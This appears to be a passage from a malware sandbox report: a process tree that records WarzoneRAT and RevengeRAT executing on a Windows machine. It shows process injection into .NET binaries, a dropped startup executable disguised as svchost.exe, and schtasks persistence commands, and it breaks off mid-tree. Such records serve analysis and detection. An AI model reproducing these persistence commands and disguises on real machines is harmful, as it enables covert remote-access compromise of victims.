  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3976 /prefetch:1
  2⤵
  PID:4440
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3796 /prefetch:1
  2⤵
  PID:4656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6344 /prefetch:1
  2⤵
  PID:3456
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6492 /prefetch:8
  2⤵
  PID:4672
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6408 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1
  2⤵
  PID:1656
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:1
  2⤵
  PID:3816
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5980 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4676
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:1
  2⤵
  PID:3920
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6772 /prefetch:8
  2⤵
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
  2⤵
  PID:4376
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6432 /prefetch:8
  2⤵
  PID:5032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
  2⤵
  PID:4356
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6080 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1056
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7020 /prefetch:8
  2⤵
  PID:240
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5912 /prefetch:1
  2⤵
  PID:1972
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5992 /prefetch:8
  2⤵
  PID:1828
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1708 /prefetch:1
  2⤵
  PID:5032
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1276 /prefetch:8
  2⤵
  PID:3420
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6408 /prefetch:8
  2⤵
  PID:3364
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4888 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1184
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4644 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:2172
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5928 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:5016
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6976 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:1540
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3772 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:3332
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6980 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4912
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=4956 /prefetch:8
  2⤵
  PID:3508
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1872,9162787493976767240,5232372556625570316,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6084 /prefetch:8
  2⤵
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  PID:4448
- C:\Users\Admin\Downloads\WarzoneRAT.exe
  "C:\Users\Admin\Downloads\WarzoneRAT.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - NTFS ADS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4716
- - C:\Windows\SysWOW64\schtasks.exe
    "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jFvfxe" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4731.tmp"
    3⤵
    - Creates scheduled task(s)
    PID:2924
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    PID:2888
- C:\Users\Admin\Downloads\RevengeRAT.exe
  "C:\Users\Admin\Downloads\RevengeRAT.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
  PID:3768
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
    3⤵
    - Drops startup file
    - Suspicious use of SetThreadContext
    - NTFS ADS
    - Suspicious use of AdjustPrivilegeToken
    PID:1420
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
      4⤵
      PID:428
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\pl6vtnhr.cmdline"
      4⤵
      PID:2636
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBA7C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2DB20CA25FD3451B97C71A216ABBEB33.TMP"
        5⤵
        
        PID:2152
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\j2pqlswk.cmdline"
      4⤵
      PID:1716
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBB19.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc68F580B4A87E458C89EED28DBE51E3F.TMP"
        5⤵
        
        PID:5288
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qeqt3olx.cmdline"
      4⤵
      PID:5624
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESBC41.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD93C4F0361D6491784C0AA5A3CEE4DF7.TMP"
        5⤵
        
        PID:5792
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\iqvcf1mp.cmdline"
      4⤵
      PID:5828
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC2D9.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAB307145B69C4C4CB48CB6D7177A697.TMP"
        5⤵
        
        PID:5616
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\knvxkex3.cmdline"
      4⤵
      PID:5692
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC876.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc1C421ED7E4984BA381E73EE191AFDBF.TMP"
        5⤵
        
        PID:5676
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qhy74vyz.cmdline"
      4⤵
      PID:5620
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCC10.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcC75B88A52FBD482E8E7DDFC26963D7C2.TMP"
        5⤵
        
        PID:1168
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\v9be5zuj.cmdline"
      4⤵
      PID:4556
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCD78.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcE720FB78895D4DC7898CAB31FC77A07D.TMP"
        5⤵
        
        PID:2532
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\chdwsnar.cmdline"
      4⤵
      PID:4456
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCE52.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcA0381026657C44CD8B7E9EB26FB0B9D.TMP"
        5⤵
        
        PID:1680
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\_azivvp5.cmdline"
      4⤵
      PID:1456
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF4C.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF867511672C4CF7AEE88AF4891BE2B.TMP"
        5⤵
        
        PID:3500
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\7rf9ixxs.cmdline"
      4⤵
      PID:4912
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFAA.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4D5137CC53714C50BE9731B01BCEB9C1.TMP"
        5⤵
        
        PID:2636
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\du5x-dhb.cmdline"
      4⤵
      PID:5264
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD095.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcD5F96EAD23CC46D48310782FA08447E5.TMP"
        5⤵
        
        PID:5372
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\shexbeov.cmdline"
      4⤵
      PID:3484
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD0F2.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc2C7C71A791C74812A44EAE6846B45CAB.TMP"
        5⤵
        
        PID:5564
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\41lpovgc.cmdline"
      4⤵
      PID:5780
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD22B.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4EA5A139F8184A8787AE11A537A2EDFF.TMP"
        5⤵
        
        PID:3312
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\k_2t-fxt.cmdline"
      4⤵
      PID:6016
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD354.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF811E1A4635D4FFDA64BFBEC51626682.TMP"
        5⤵
        
        PID:5160
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\qxii6hgy.cmdline"
      4⤵
      PID:5652
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD519.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcAB7CE16FC72841A7AFBBC078C5CA87C3.TMP"
        5⤵
        
        PID:5152
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\rdwhkaj0.cmdline"
      4⤵
      PID:4012
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD6BF.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc3761E13DA9114D30BD18E343AC1949F.TMP"
        5⤵
        
        PID:5340
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ncrfhijm.cmdline"
      4⤵
      PID:1964
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD874.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF74471291B424C9AA8DC98EA3A29624F.TMP"
        5⤵
        
        PID:5620
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\ychu2quk.cmdline"
      4⤵
      PID:1360
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD95F.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4DE92DC769CB42CEBDA2261EBCF657CA.TMP"
        5⤵
        
        PID:4248
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\lypqely-.cmdline"
      4⤵
      PID:2388
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA0A.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF34741D9A52240DB979CCF6A6C2EDD5.TMP"
        5⤵
        
        PID:2692
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\mwabmrte.cmdline"
      4⤵
      PID:3020
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDA97.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcF1BB98E74D1E4AEFA4DF7E142BEBF729.TMP"
        5⤵
        
        PID:3116
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\sqol_uuv.cmdline"
      4⤵
      PID:4296
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESDBFE.tmp" "C:\Users\Admin\AppData\Local\Temp\vbc4714408892474A1A9AD158D699AEB9E7.TMP"
        5⤵
        
        PID:3412
  - - C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe
      "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of AdjustPrivilegeToken
      PID:5188
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        5⤵
        Drops startup file
        Adds Run key to start application
        Suspicious use of SetThreadContext
        NTFS ADS
        Suspicious use of AdjustPrivilegeToken
        
        PID:5580
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe"
        6⤵
        
        PID:6080
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /sc minute /mo 1 /tn "svchost" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.exe"
        6⤵
        Creates scheduled task(s)
        
        PID:572
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\t62ieksg.cmdline"
        6⤵
        
        PID:6612
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA114.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcB15E2A66A2B544B4ACC9B7A09445867A.TMP"
        7⤵
        
        PID:6964
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe" /noconfig @"C:\Users\Admin\AppData\Local\Temp\o5zwnyr7.cmdline"
        6⤵
        
        PID:8120
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA624.tmp" "C:\Users\Admin\AppData\Local\Temp\vbcFD0D6F1536BA46A4962C7AF2469A888.TMP"
        7⤵
        
        PID:5216
      - C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe
        
